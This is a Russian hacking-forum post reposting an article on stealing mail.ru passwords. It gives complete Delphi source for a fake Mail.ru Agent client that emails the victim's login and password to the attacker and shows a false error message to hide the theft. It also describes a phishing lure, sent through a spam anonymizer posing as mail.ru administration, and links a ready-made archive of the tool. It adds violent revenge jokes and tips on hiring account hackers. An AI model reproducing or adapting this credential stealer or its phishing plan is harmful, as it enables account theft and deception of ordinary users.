Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование

Хакер, взлом, программа, сайт, форум, информатика, железо, разгон, раскрутка, SEO, защита, безопасность, взломать, как взломать, взлом icq, взлом вконтакте, взлом программ, одноклассники, взлом почты, взлом аськи
Текущее время: 18-05, 07:28

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ 1 сообщение ] 
Автор Сообщение
 Заголовок сообщения: Mra - липовый MailAgent
СообщениеДобавлено: 25-10, 16:54 
Не в сети
<b>GARANT</b>
Аватара пользователя

Зарегистрирован: 29-05, 17:36
Сообщения: 419
Здарова вхаЦкеры. Тут статейку одну интересную нашел, содержание такое, цитирую: "Привет Всем!
Сразу скажу, - статья в большей степени посвящена начинающим и не очень.
Насколько известно, есть много способов отъёма почтовых ящиков: троянизации, СИ, брут и тому подобное.
И два еще: известно, что 100% ящик невозможно увести, если ты, конечно, не админ того сервиса, который ломаешь (там и ломать не надо).

Но бывают случаи, когда все-таки необходимо нагадить в душу человеку, сделавшему гавно в твой адрес! Раскинув головным мозгом, можно прийти к выводу, что все-таки почтовый ящик недруга можно увести, и этим самым отомстить обидчику! Ведь в интернете месть одного человека другому, как правило, сводится к изничтожению почтовых ящиков, асек, хаканью сайтов, ну и так - по мелочам!
Больше-то, в принципе, ничего не сделаешь! Для тех, кому эти варианты не подходят, рекомендую найти негодяя в реальной жизни, оторвать ему все пальцы на руках, кроме мизинцев, чтобы в следующий раз он не так быстро печатал свои ругателства! Но это, конечно, только один из вариантов! Особые извращенцы могут попробовать засунуть в жопу мерзавца трансформаторную будку! (даже сам не знаю, как такая мысль пришла в голову).
Продолжим.... Задача есть - сложность методологии решения зависит от отмороженности, скорее отрешенности или просто тупости человека, чей почтовый ящик является целью атаки. Если человек продвинут в области компьютерных технологий, то лучше и не пытаться развести его на то, чтобы он выслал пароль от своего почтового ящика на другой ящик, объясняя это тем, что произошла солнечная буря на Марсе, из-за чего почтовый сервер потерял все пароли и ему одному требуется подтвердить свой пароль.
Скорее всего, для таких людей подойдет вариант взлома всего почтового сервиса и рыскания в БД в поисках его пароля!
Конечно, такой вариант - это верх профессионализма, он связан как с большим гемороем, так и с большими выгодами. Он нам не подходит!

Идея нижеизложенного способа отъема почты хорошо подходит для людей среднего ума или средней тупости, чей почтовый ящик является целью.

Данный способ немыслим без использования Социальной Инженерии, как в основном и все способы взлома.

Итак, скажу сразу: СИ с применением тех. навыков - оч грозное оружие. Чем мы сегодня займемся? Мы пофантазируем и начнём кодить. Да, именно кодить. Выбираем почтовый сервис mail.ru (мой любимый -)) - именно ему и посвящена статья. Что мы делаем? Давайте представим, что мы сами с вами
админы майла и хотим улучшить работу своего сервиса, сделать что-то новое и лучшее для своих пользователей, увеличить ящики, или, например,
подключить какую-нить услугу (дал мыслю на фантазию php скрипт немного легенды, хост с рассылкой и вперед) -)) .

Наша жертва: драгоценный mail.agent, сокращенно Mra. Почему бы не подделать его? И не выслать по аномайзеру или спам-рассыльщику с
какого-нить далекого хоста по спам-листу или конкретным жертвам.
В левом письме будет содержаться информация о том, что админы сервиса спят и видят сны только о том, как улучшить работу своей почтовой службы. И вот один из таких админов придумал новую фишку для мэйл-агента, в которой будет доступна новая функция, с помощью который вы сможете лично поговорить с тем сотрудником ФСБ, который читает вашу почту. НО эта функция доступна в мэйл-агенте только новой версии, ссылка на который будет в письме! НЕСОМНЕННО люди помчаться скачивать новый мэйл-агент, чтобы попросить дядьку из ФСБ, чтобы он не читал их почту или попросить его о том, чтобы он прочитал интересные места из переписки вашей жены и её любовника, и потом вкратце рассказал вам, какая поза для сношений у них самая любимая!

Поэтому мы напишем свой собственный мэйл-агент, задача которого будет отсылать введенные в него реквизиты на другой почтовый ящик.
Нам понадобиться Delphi 7, как говорят англичане, - небольшой кусочек мозгов и умение копировать.

Ниже будет выложен исходный код с комментами:


unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls, IdBaseComponent, IdComponent,
IdTCPConnection, IdTCPClient, IdMessageClient, IdSMTP, Mask, idMessage, ShellAPI;

type
TForm1 = class(TForm)
Image1: TImage;
Label1: TLabel;
Button1: TButton;
Button2: TButton;
Label2: TLabel;
CheckBox1: TCheckBox;
Label3: TLabel;
Label4: TLabel;
ComboBox1: TComboBox;
Edit1: TEdit;
IdSMTP1: TIdSMTP;
MaskEdit1: TMaskEdit;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
procedure Label1Click(Sender: TObject);
procedure Label2Click(Sender: TObject);


private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;
implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);
var
M: TIdMessage;
begin
M := TIdMessage.Create(Form1);

M.Body.Add('Мыло:' + ' ' + Edit1.Text + '@' + ComboBox1.Text + #10#13 + #10#13 + 'Pасс:' + ' ' + MaskEdit1.Text); // тело письма
M.From.Text := Edit1.text + '@' + ComboBox1.Text; // от кого
M.Recipients.Add; // получателей может быть несколько
M.Recipients.Items[0].Text := \'мыло получателя\';
// M.Recipients.Items[1].Text := \'мыло второго получателя, если нужно\';
M.Subject := 'Mail.ru Agent'; // тема письма

IdSMTP1.AuthenticationType := atLogin; // если сервер требует авторизации
IdSMTP1.Host := 'smtp.' + ComboBox1.text; // хост сервера
IdSMTP1.Username := Edit1.text; // логин
IdSMTP1.Password := MaskEdit1.Text; // пасс
IdSMTP1.Connect();
// отправка мыла будет произведена от имени юзера
// то есть он должен правильно заполнить логин и пасс, иначе мыло не отправится
if IdSMTP1.Connected then
begin
try
IdSMTP1.Send(M);
Application.MessageBox('Невозможно соединиться с сервером. Проверьте настройки вашего соединия','Error!',MB_ICONERROR);
// ошибка появится, если письмо успешно отправлено
except
Application.MessageBox('Неправильная пара Логин-Пароль','Error!',MB_ICONERROR);
// ошибка появится, если юзер ввёл неправильный логин или пасс
end;
IdSMTP1.Disconnect;
end;
end;


procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;

procedure TForm1.Label1Click(Sender: TObject);
begin
ShellExecute(Handle, 'open', 'http://win.mail.ru/cgi-bin/signup', nil, nil, SW_SHOWMAXIMIZED);
end;

procedure TForm1.Label2Click(Sender: TObject);
begin
ShellExecute(Handle, 'open', 'http://www.mail.ru/pages/help/92.html', nil, nil, SW_SHOWMAXIMIZED);
end;
end.


Вот и все! Наш мейл-агент будет проверять почты на реально существующие (для тех, кто в танке и капитанов дальнего плавания - если кто-то там вбил неправильный пасс, он, как и реальный, выдаст
ошибку "работает только с реальными мылами и пассами"). Сам же агент при вводе правильных пассов и мыла выдаст ошибку (её вы можете сменить сами - смотрите исходник и комменты), а тем временем пасики пришлются на Ваше мыло. Можете его вообще доработать и сделать настоящим работающим (если, конечно, найдёте исходники или напишите сами).



Ну и скажете, что дальше? А дальше - работа на фантазию - изменяй картинку на новую версию агента, например, 4.8, думай к нему легенду, рассылай одиночным жертвам в чате, или автоматом через спам-аномайзер от Администрации mail.ru .

P.S. На самом деле, сие мероприятие, которое мы проделали, можно замутить практически с любым сервисом, и все получится, если ты не критически туп. Главное - это фантазия и немного технического обеспечения, благо его сейчас хватает. Ведь этот способ довольно прост, и того, кто попробует это и получит пассворд от почтового ящика своей подружки или еше кого, того прошибет десятый пот радости и ощущение эйфории от собственного могущества. Что не совсем правда. Но не надо забывать о том, что задумав такое негодяйское дело, вы совершаете грязный поступок! Думайте и помните про статьи УК РФ 272, 273!

P.S. Возможно, кто-то скажет щас, что за чушь ты дал? Можно протроянить и все, или склеить там с ним. Ну хз так же интереснее-))
Если вы заказываете ящик у кого-то на взлом, никогда не соглашайтесь с теми, кто требует предоплаты и говорит уверенно, что взломает за 2 дня. Уверенно пароль Вам может дать подкупленный админ самого сервиса.

P.S. Статья и исходники даны только в целях ознакомления ! ! ! -))

Всё остальное: картинки, иконки, сам целый исходник и пример самого мейл-агента можно скачать прямо с нашего сайта в разделе "Скрипты" - архив Mra. http://www.bit-team.com/scripts/Mra.rar



(C) 2005-2006 bit-team.com


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ 1 сообщение ] 

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB